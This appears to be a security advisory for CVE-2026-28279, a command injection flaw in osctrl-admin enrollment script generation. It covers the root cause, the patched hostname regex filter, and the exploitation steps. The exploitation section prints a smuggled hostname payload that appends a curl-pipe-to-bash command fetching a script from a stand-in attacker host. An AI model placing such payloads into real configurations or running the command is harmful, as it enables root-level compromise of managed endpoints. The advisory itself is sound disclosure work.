osctrl-admin Enrollment Script Command Injection

A security flaw has been identified in osctrl-admin, the administrative interface for the osctrl osquery management solution. The vulnerability, classified as OS Command Injection (CWE-78), resides in the logic used to generate enrollment scripts—"one-liners" provided to administrators for deploying osquery agents to endpoints. The affected component fails to properly sanitize user-supplied configuration data before embedding it into shell (Linux/macOS) and PowerShell (Windows) scripts.

This flaw introduces a significant supply-chain risk within the managed environment. Although the vulnerability requires administrative authentication to the management console, it allows a compromised or malicious administrator to pivot from the central server to the managed endpoints. Because enrollment scripts are typically executed with elevated privileges (root or SYSTEM) to install system services, the injected commands inherit these permissions, granting the attacker full control over the target machine during the enrollment phase.

The root cause of this vulnerability is the unsafe use of Go's text/template package for generating executable scripts, combined with a lack of input validation on the hostname parameter. In the osctrl-admin backend, environment configurations allow administrators to specify a hostname where the osquery agents should connect (e.g., osctrl.example.com).

When an administrator requests an enrollment script, the backend reads a template file and substitutes the configuration values into the script text. The text/template engine performs raw string substitution and does not offer context-aware escaping for shell syntax. Consequently, if the hostname parameter contains shell metacharacters—such as semicolons (;), pipes (|), or command substitutions ($() or `)—these characters are written literally into the generated script.

For example, a legitimate script line might look like this: ./osquery-install.sh --flag --hostname \{\{ .Hostname \}\}

If the input is not sanitized, a malicious input transforms the line into valid shell logic that executes an additional command: ./osquery-install.sh --flag --hostname osctrl.com; malicious_command

The remediation for CVE-2026-28279 involves enforcing strict input validation on environment parameters before they are persisted to the database. The maintainers introduced a specific regex filter to ensure the hostname contains only safe characters (alphanumeric, dots, and hyphens).

Vulnerable Logic (Conceptual): Previously, the HTTP handler for updating environments accepted the hostname string directly from the POST request body and saved it to the configuration store without validating its contents against a strict allow-list.

Patched Logic (v0.5.0): A new validation function was added in pkg/environments/filters.go to reject any input containing shell metacharacters.

// pkg/environments/filters.go
const (
    // Strict regex allowing only alphanumeric chars, dots, and hyphens
    hostnameRegex string = `^[a-zA-Z0-9.\-]+$`
)
 
func HostnameFilter(s string) bool {
    re := regexp.MustCompile(hostnameRegex)
    return re.MatchString(s)
}

The EnvsPOSTHandler in cmd/admin/handlers/post.go was updated to invoke this filter. If VerifyEnvFilters fails, the server returns an error code (400 Bad Request or 500 Internal Server Error) and refuses to save the malicious configuration, preventing the injection at the source.

Exploitation of this vulnerability requires an attacker to possess credentials for the osctrl-admin interface. Once authenticated, the attack follows a specific workflow targeting the enrollment process.

1. Injection: The attacker navigates to the environment configuration settings and modifies the hostname field. Instead of a valid domain, they input a payload such as osctrl.local; curl http://attacker-c2.com/payload.sh | bash.
2. Generation: The attacker (or a legitimate administrator unaware of the change) generates an enrollment script (e.g., a .sh or .ps1 one-liner) from the UI. The backend templates the malicious string directly into the command arguments of the script.
3. Execution: The script is distributed to a target machine. When an operator runs this script with sudo or as Administrator to install osquery, the shell interprets the semicolon as a command separator. It executes the osquery installation command, followed immediately by the injected curl/bash command.

This attack vector is particularly dangerous because it occurs before the security agent is successfully installed and reporting. The malicious activity runs outside the visibility of the tool meant to monitor the system.

The impact of CVE-2026-28279 is rated High (CVSS 7.3) due to the potential for complete system compromise on enrolled endpoints. While the requirement for high privileges (PR:H) and user interaction (UI:R) lowers the base score, the Scope Change (S:C) reflects the critical nature of the vulnerability: a compromise of the management plane leads directly to a compromise of the managed infrastructure.

Key Risks:

• Remote Code Execution: Arbitrary commands run as root/SYSTEM on endpoints.
• Persistence: Attackers can install backdoors or rootkits during the enrollment phase, ensuring access even if the osquery agent is later removed or reconfigured.
• Lateral Movement: Compromising the enrollment server allows an attacker to pivot to any new machine joining the network, potentially affecting the entire fleet if the corrupted script is widely distributed.